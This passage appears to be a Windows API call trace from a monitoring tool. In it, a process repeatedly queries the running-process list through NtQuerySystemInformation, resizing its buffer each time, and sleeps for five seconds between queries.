ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0269.486] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0269.487] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0269.487] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0269.487] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0269.490] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0269.491] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0269.573] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0269.574] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0269.575] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0269.576] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0269.576] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0269.582] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0269.583] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0269.584] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0269.584] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0269.585] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0269.585] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0269.586] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0269.589] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0269.590] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0269.591] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0269.591] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0269.592] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0269.592] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0269.592] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0269.599] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0269.600] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0269.601] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0269.602] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0269.603] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0269.603] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0269.603] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0269.606] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0269.607] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0269.608] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0269.609] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0269.609] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0269.609] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0269.610] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0269.613] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0269.614] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0269.615] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0269.615] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0269.616] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0269.616] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0269.616] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0269.620] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0269.621] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0269.623] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0269.623] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0269.624] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0269.624] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0269.624] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0269.630] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0269.631] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0269.633] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0269.634] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0269.634] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0269.635] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0269.635] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0269.639] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0269.640] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0269.642] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0269.642] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0269.643] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0269.643] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0269.644] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0269.648] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0269.649] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0269.651] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0269.651] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0269.652] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0269.653] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0269.653] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0269.658] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0269.659] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0269.660] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0269.661] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0269.662] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0269.662] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0269.662] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0269.667] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0269.668] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0269.669] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0269.669] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0269.670] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0269.671] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0269.671] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0269.675] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0269.676] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0269.679] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0269.680] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0269.681] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0269.681] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0269.681] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0269.686] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0269.687] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0269.688] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0269.689] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0269.689] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0269.690] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0269.690] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0269.695] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0269.695] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0269.697] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0269.698] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0269.698] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0269.699] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0269.699] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0269.703] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0269.704] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0269.705] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0269.706] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0269.706] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0269.707] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0269.707] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0269.711] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0269.712] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0269.713] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0269.713] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0269.714] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0269.715] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0269.845] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0269.851] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0269.853] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0269.854] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0269.854] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0269.855] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0269.855] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0269.855] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0269.859] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0269.859] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0269.861] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0269.861] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0269.862] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0269.862] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0269.862] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0269.865] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0269.866] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0269.868] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0269.868] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0269.868] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0269.868] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0269.869] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, 